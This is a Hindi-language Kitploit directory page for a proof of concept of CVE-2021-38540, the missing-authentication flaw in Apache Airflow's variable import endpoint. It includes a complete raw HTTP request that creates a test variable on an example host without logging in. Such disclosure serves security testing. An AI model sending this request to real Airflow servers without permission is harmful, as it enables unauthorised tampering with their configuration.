Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-for-CVE-2021-38540- — महत्वपूर्ण घटक पर प्रमाणीकरण की कमी CVE-2021-38540 | Kitploit
उपकरण/GitHubGitHub/captain-v-hook/poc-for-cve-2021-38540-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणगलत कॉन्फ़िगरेशन
GitHubcaptain-v-hook/poc-for-cve-2021-38540-

PoC-for-CVE-2021-38540-

महत्वपूर्ण घटक पर प्रमाणीकरण की कमी CVE-2021-38540

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
44 साल पहलेअभी तक समीक्षित नहीं

CVE-2021-38540 प्रूफ ऑफ कॉन्सेप्ट

महत्वपूर्ण घटक पर अनुपस्थित प्रमाणीकरण जिसे CVE-2021-38540 के नाम से जाना जाता है

इस बग के बारे में:

Airflow >=2.0.0, <2.1.3 में वेरिएबल इम्पोर्ट एंडपॉइंट प्रमाणीकरण द्वारा सुरक्षित नहीं था। इसने अप्रमाणित उपयोगकर्ताओं को DAGs में उपयोग किए जाने वाले Airflow वेरिएबल्स को जोड़ने/संशोधित करने के लिए उस एंडपॉइंट को हिट करने की अनुमति दी, जिसके परिणामस्वरूप संभावित रूप से सेवा से इनकार, सूचना प्रकटीकरण या रिमोट कोड निष्पादन हो सकता है। यह समस्या Apache Airflow >=2.0.0, <2.1.3 को प्रभावित करती है। [CVE-2021-38540]

इस PoC के बारे में:

इस POC में एक अनुरोध है जो Admin>variables [ List Variables ] के अंतर्गत kafka_captainhook_user नामक एक वेरिएबल बनाएगा।

PoC स्रोत:

root@kitploit:~
POST /variable/varimport HTTP/2
Host: airflow.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33976360506209910502051128075
Content-Length: 398
Origin: https://airflow.example.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------33976360506209910502051128075
Content-Disposition: form-data; name="csrf_token"

 
-----------------------------33976360506209910502051128075
Content-Disposition: form-data; name="file"; filename="variables.json"
Content-Type: application/json

{
    "kafka_captainhook_user": "testCaptain"
}

-----------------------------33976360506209910502051128075--

संदर्भ

https://nvd.nist.gov/vuln/detail/CVE-2021-38540 https://lists.apache.org/thread.html/rac2ed9118f64733e47b4f1e82ddc8c8020774698f13328ca742b03a2@%3Cannounce.apache.org%3E https://lists.apache.org/thread.html/rb34c3dd1a815456355217eef34060789f771b6f77c3a3dec77de2064%40%3Cusers.airflow.apache.org%3E

टूल डाउनलोड करें